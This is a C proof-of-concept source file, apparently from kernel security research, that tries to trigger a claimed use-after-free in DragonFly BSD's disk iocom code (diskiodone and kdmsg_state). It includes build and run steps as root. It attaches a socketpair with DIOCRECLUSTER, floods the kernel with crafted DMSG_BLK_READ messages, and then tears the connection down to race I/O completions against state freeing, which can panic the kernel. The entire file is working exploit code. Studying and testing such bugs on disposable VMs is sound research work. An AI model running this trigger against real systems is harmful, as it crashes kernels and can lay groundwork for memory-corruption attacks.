DF-0117 / trigger.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 | /* * DF-0117 PoC (self-contained trigger) -- attempt to reproduce the alleged * UAF on kdmsg_state in diskiodone (sys/kern/subr_diskiocom.c:580/582/650). * * Claim under test (finding DF-0117): * In disk_blk_read/write/flush/freeblks the kdmsg state pointer is stored * in bio->bio_caller_info1.ptr and dispatched to dev_dstrategy() async, * but NO reference is taken on the state (kdmsg_state_hold() is commented * out at subr_diskiocom.c:375/451/503/554, drop at :661). If the kdmsg * peer sends DELETE or the connection drops while I/O is in flight, the * kdmsg core frees the state; when diskiodone fires on completion it * dereferences the freed state (:580/:582/:650) -> UAF. * * Setup solved (reused from sibling finding DF-0017): * A DMSG iocom fd is attached to the kernel disk-iocom parser by opening * a raw disk device node and issuing DIOCRECLUSTER (sys/sys/diskslice.h) * with one end of an AF_UNIX socketpair. We then drive wire DMSG messages * on the other end. The hammer2 userland daemon pre-connects every disk * iocom at boot via DIOCRECLUSTER and would deadlock a follow-on reconnect, * so run.sh does `pkill -9 -x hammer2` first to free the disk iocom. * * Strategy (single-shot per process to avoid the reconnect deadlock): * 1. Establish the iocom ONCE (open /dev/vbd0, socketpair, DIOCRECLUSTER). * 2. Send a large burst of DMSG_BLK_READ|CREATE[|DELETE] messages, each * dispatching a real async disk I/O on the root disk via dev_dstrategy, * storing bio->bio_caller_info1.ptr = msg->state with NO state hold. * 3. Race the I/O completions against state teardown: optionally send * explicit DELETE on every state, then close the socket -> reader EOF * -> writer-thread teardown -> kdmsg_simulate_failure(state0) walks + * aborts + frees all states. * If the UAF is real, a diskiodone dereferences a freed kdmsg_state_t * and the INVARIANTS kernel panics (KKASSERT in kdmsg_state_free or a * page fault on freed slab memory). * 4. Wait for the teardown to drain, then exit. run.sh re-runs with a * guest reset between variants. * * Build (DragonFly, any user): * cc -O2 -o trigger trigger.c -lpthread * * Run (as ROOT -- needs /dev/vbd0 + DIOCRECLUSTER): * ./trigger [nreads] [mode] [preclose_us] * nreads default 256 * mode 0 = CREATE only (eof=0) * 1 = CREATE|DELETE (eof=1) * 2 = CREATE then explicit DELETE msg on each state * preclose_us default 2000 (delay between burst and socket close) * * Expected (bug present): kernel panic in diskiodone / kdmsg_state_free / * page fault on freed kdmsg_state_t memory (captured in boot.log). * Expected (state protected by topology refs): trigger exits cleanly, * guest stays up, dmesg clean. * * WARNING: may panic a vulnerable kernel. Run only on a disposable VM. */ #include <sys/types.h> #include <sys/ioctl.h> #include <sys/diskslice.h> /* DIOCRECLUSTER, struct disk_ioc_recluster */ #include <sys/dmsg.h> #include <sys/socket.h> #include <pthread.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <err.h> #define DMSG_DISK "/dev/vbd0" /* dmsg base wire header is 64 bytes; BLK_READ extended header is 128 bytes * (SIZE field = 2, hbytes = 2*64 per kern_dmsg.c:348). Only the first 32 * bytes after the base head carry blk_read fields; the rest is padding the * reader still consumes. We send the full 128. */ #define BLK_READ_HDR_BYTES 128 struct blk_read_wire { dmsg_hdr_t hdr; /* 64 bytes */ uint64_t keyid; /* +0x40 */ uint64_t offset; /* +0x48 */ uint32_t bytes; /* +0x50 */ uint32_t flags; /* +0x54 */ uint32_t reserved01; /* +0x58 */ uint32_t reserved02; /* +0x5c */ unsigned char pad[32]; /* +0x60 .. +0x7f (reader reads 128) */ } __attribute__((packed)); /* Build a BLK_READ wire message. cmd is DMSG_BLK_READ possibly OR'd with * DMSGF_CREATE / DMSGF_DELETE. msgid identifies the transaction; circuit * selects the parent state (0 == state0 == top-level transaction). */ static void mk_blk_read(void *buf, uint32_t cmd, uint64_t msgid, uint64_t circuit, uint64_t offset, uint32_t bytes) { struct blk_read_wire *w = buf; memset(buf, 0, BLK_READ_HDR_BYTES); w->hdr.magic = DMSG_HDR_MAGIC; /* 0x4832 */ w->hdr.msgid = msgid; w->hdr.circuit = circuit; w->hdr.cmd = cmd; /* already carries SIZE field */ w->hdr.aux_bytes = 0; w->hdr.aux_crc = 0; w->hdr.hdr_crc = 0; /* receive path does not verify */ w->keyid = 0; w->offset = offset; w->bytes = bytes; } /* Drain thread: read & discard whatever the kernel writes back (LNK_CONN, * BLK_ERROR replies, LNK_PING...) so the socket send buffer never fills and * deadlocks the kernel's writer thread. */ static void * drain(void *arg) { int fd = *(int *)arg; char buf[8192]; for (;;) if (read(fd, buf, sizeof(buf)) <= 0) break; return NULL; } int main(int argc, char **argv) { setvbuf(stderr, NULL, _IONBF, 0); int nreads = (argc > 1) ? atoi(argv[1]) : 256; int mode = (argc > 2) ? atoi(argv[2]) : 0; int preclose_us= (argc > 3) ? atoi(argv[3]) : 2000; if (nreads < 1) nreads = 1; int diskfd = open(DMSG_DISK, O_RDWR); if (diskfd < 0) err(1, "open %s (need root/operator for DIOCRECLUSTER)", DMSG_DISK); fprintf(stderr, "[*] opened %s fd=%d; nreads=%d mode=%d\n", DMSG_DISK, diskfd, nreads, mode); int sv[2]; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) err(1, "socketpair"); int sv_kern = sv[0], sv_us = sv[1]; pthread_t dt; pthread_create(&dt, NULL, drain, &sv_us); struct disk_ioc_recluster recl; memset(&recl, 0, sizeof(recl)); recl.fd = sv_kern; if (ioctl(diskfd, DIOCRECLUSTER, &recl) < 0) err(1, "DIOCRECLUSTER"); fprintf(stderr, "[1] DIOCRECLUSTER ok (sv_kern=%d sv_us=%d)\n", sv_kern, sv_us); char buf[BLK_READ_HDR_BYTES]; uint32_t basecmd = DMSG_BLK_READ; /* 0x00500302 */ uint32_t create_flags; switch (mode) { case 1: create_flags = DMSGF_CREATE | DMSGF_DELETE; break; /* eof=1 */ case 2: create_flags = DMSGF_CREATE; break; /* DEL later */ default: create_flags = DMSGF_CREATE; break; /* eof=0 */ } /* dispatch a burst of reads -- each CREATE makes a new kdmsg state and * dispatches one async disk I/O that stores a raw state pointer with * NO state hold. */ for (int i = 0; i < nreads; i++) { uint64_t msgid = (uint64_t)(i + 1); mk_blk_read(buf, basecmd | create_flags, msgid, 0, 0, 512); ssize_t w = write(sv_us, buf, BLK_READ_HDR_BYTES); if (w != BLK_READ_HDR_BYTES) warn("write BLK_READ i=%d rv=%zd", i, w); } fprintf(stderr, "[2] wrote %d BLK_READ|CREATE messages\n", nreads); if (mode == 2) { /* send explicit DELETE on each state to drive rxcmd |= DELETE * (and another round of I/O dispatch) before teardown */ for (int i = 0; i < nreads; i++) { uint64_t msgid = (uint64_t)(i + 1); mk_blk_read(buf, basecmd | DMSGF_DELETE, msgid, 0, 0, 512); write(sv_us, buf, BLK_READ_HDR_BYTES); } fprintf(stderr, "[2a] wrote %d BLK_READ|DELETE messages\n", nreads); } /* let some I/Os land in flight, then tear the connection down -- * races diskiodone vs writer-thread kdmsg_simulate_failure teardown */ usleep(preclose_us); fprintf(stderr, "[3] closing sv_us -> reader EOF -> teardown race\n"); close(sv_us); sv_us = -1; /* give the writer teardown loop (hz/2 sleeps) plenty of time to drain * all states through diskiodone */ fprintf(stderr, "[4] waiting 4s for teardown to complete...\n"); sleep(4); /* drain thread exits when its socket end closed */ pthread_join(dt, NULL); fprintf(stderr, "[done] %d reads dispatched; no panic observed by userspace\n", nreads); close(diskfd); return 0; } |